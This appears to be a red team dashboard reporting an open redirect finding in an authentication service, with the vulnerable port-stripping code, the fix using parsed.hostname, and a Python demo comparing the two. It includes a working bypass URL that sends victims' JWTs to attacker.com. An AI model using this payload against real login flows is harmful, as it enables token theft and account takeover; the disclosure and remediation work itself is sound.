Red Team Dashboard

Security Findings for authreturn.com

v1.0.2

Critical Findings: 1
Secure: 1
Not Tested: 4

Redirect URI Validation Bypass

Critical

Summary

Open redirect vulnerability allows attackers to steal authentication tokens by exploiting URL parsing differences between the server and browsers.

Vulnerable Code

File: auth-return-server.py lines 106-109

redirect_domain = parsed.netloc.lower()
# Remove port if present for comparison
if ':' in redirect_domain:
    redirect_domain = redirect_domain.split(':')[0]  # BUG!

The Problem

The code attempts to strip a port by splitting the netloc on ':', but when the netloc carries userinfo (user:pass@host) the first ':' belongs to the userinfo, not to a port. The server therefore takes the username portion as the host and validates the wrong component.

Attack Vector

Malicious URL:

https://authreturn.com/auth/login?app_id=123&redirect_uri=https://allowed.com:x@attacker.com/steal
  1. Server parses netloc = "allowed.com:x@attacker.com"
  2. Server sees :, splits, takes [0] = "allowed.com"
  3. Server validates against allowlist → PASSES!
  4. User authenticates on legitimate authreturn.com login page
  5. Server redirects with token to the "validated" URL
  6. Browser interprets allowed.com:x as credentials
  7. Browser navigates to attacker.com/steal?token=JWT
  8. Attacker receives victim's valid 30-day JWT!

Impact

  • Complete account takeover - Attacker obtains valid JWT
  • Affects all integrating apps - Any app using authreturn.com
  • Invisible to user - Victim sees legitimate login page
  • Token valid 30 days - Long exploitation window

Fix Applied

Use parsed.hostname, which returns only the host (userinfo and port stripped) and None when the URL has no host component:

# Use hostname property to correctly extract host, ignoring userinfo and port
# This prevents bypass via URLs like https://allowed.com:x@attacker.com/
redirect_domain = parsed.hostname.lower() if parsed.hostname else ''
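As an added example (not the dashboard's or auth-return-server.py's own code), the two extractors side by side with a shared allowlist check, run against the redirect_uri from the report and a legitimate callback. ALLOWED_DOMAINS, the LEGIT_URL value and the helper names are assumptions made for this example.

```python
from urllib.parse import urlparse

# Constructed allowlist for the example; the real server's allowlist is not on the page.
ALLOWED_DOMAINS = {"allowed.com"}


def vulnerable_redirect_domain(redirect_uri):
    """Reproduces the auth-return-server.py logic: strip a port by splitting netloc on ':'."""
    parsed = urlparse(redirect_uri)
    redirect_domain = parsed.netloc.lower()
    if ':' in redirect_domain:
        # Takes everything before the first ':'. When the netloc is 'user:pass@host'
        # that is the username, not the host, so the wrong component is validated.
        redirect_domain = redirect_domain.split(':')[0]
    return redirect_domain


def fixed_redirect_domain(redirect_uri):
    """The applied fix: hostname drops userinfo and port, and is None for hostless URLs."""
    parsed = urlparse(redirect_uri)
    return parsed.hostname.lower() if parsed.hostname else ''


def is_allowed(redirect_uri, extract):
    """Exact-match allowlist check shared by both variants (hypothetical helper)."""
    return extract(redirect_uri) in ALLOWED_DOMAINS


BYPASS_URL = "https://allowed.com:x@attacker.com/steal"  # the redirect_uri from the report
LEGIT_URL = "https://allowed.com:443/callback"            # constructed legitimate callback


if __name__ == "__main__":
    for label, url in (("bypass", BYPASS_URL), ("legit", LEGIT_URL)):
        print(label, "vulnerable ->", vulnerable_redirect_domain(url),
              "allowed" if is_allowed(url, vulnerable_redirect_domain) else "rejected")
        print(label, "fixed      ->", fixed_redirect_domain(url),
              "allowed" if is_allowed(url, fixed_redirect_domain) else "rejected")
```

The vulnerable extractor returns "allowed.com" for the bypass URL and passes the allowlist; the fixed extractor returns "attacker.com" and rejects it, while the legitimate callback with an explicit port is accepted by both.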

JWT Algorithm Confusion

Secure

Test Result

The JWT implementation correctly specifies allowed algorithms, preventing alg:none and algorithm confusion attacks.

Secure Code

File: tokens.py line 32

payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])

The explicit algorithms=['HS256'] parameter ensures PyJWT rejects any token not using HS256.

Testing Status

Overview

Attack Vector                        Status              Severity
JWT Algorithm Confusion              Secure              N/A
Redirect URI Bypass                  Vulnerable (Fixed)  Critical
Rate Limit Bypass (X-Forwarded-For)  Not Tested          TBD
Password Reset Token Enumeration     Not Tested          TBD
CSRF on POST Endpoints               Not Tested          TBD
User Enumeration                     Not Tested          TBD